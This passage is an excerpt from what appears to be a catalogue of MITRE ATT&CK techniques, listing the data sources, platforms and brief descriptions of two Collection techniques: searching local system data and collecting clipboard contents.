Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre